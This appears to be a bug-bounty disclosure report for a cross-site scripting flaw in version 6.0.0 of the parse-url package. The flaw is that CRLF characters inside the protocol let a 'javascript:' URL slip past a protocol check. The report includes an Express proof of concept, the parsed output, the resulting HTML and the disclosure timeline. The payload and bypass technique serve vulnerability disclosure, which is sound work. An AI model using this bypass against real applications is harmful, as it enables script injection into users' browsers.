Cross Site Scripting via Improper Input Validation (Based on CRLF) in ionicabizau/parse-url
Valid
Reported on
Apr 4th 2022
Description
The parse-url The 6.0.0 version of the parser does not remove \r, \n characters between protocols. This causes spoofing of the javascript protocol itself.
Proof of Concept
const parseUrl = require("parse-url");
const express = require('express');
const app = express();
parsed = parseUrl("jav\r\nascript://%0aalert(1)");
console.log(parsed);
app.get('/', (req, res) => {
if (parsed.protocol !== "javascript") {
res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
}
})
app.listen(9999);
In general, the above express code forbids the javascript protocol. However, you can spoof this using the CRLF character.
output console.log(parsed);
{
protocols: [ 'jav\r\nascript' ],
protocol: 'jav\r\nascript',
port: null,
resource: '%0aalert(1)',
user: '',
pathname: '',
hash: '',
search: '',
href: 'jav\r\nascript://%0aalert(1)',
query: [Object: null prototype] {}
}
output : document in browser
<a href="jav
ascript://%0aalert(1)">CLICK ME!</a>
Impact
Through this vulnerability, an attacker is capable to execute malicious scripts.
References
We are processing your report and will contact the
ionicabizau/parse-url
team within 24 hours.
a year ago
Pocas modified the report
a year ago
We have contacted a member of the
ionicabizau/parse-url
team and are waiting to hear back
a year ago
We have sent a
follow up to the
ionicabizau/parse-url
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
ionicabizau/parse-url
team.
We will try again in 10 days.
a year ago
We have sent a
third and final
follow up to the
ionicabizau/parse-url
team.
This report is now considered stale.
a year ago
Pocas modified the report
a year ago
Pocas modified the report
a year ago
This is a good catch. Thank you very much!
Pocas
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
to join this conversation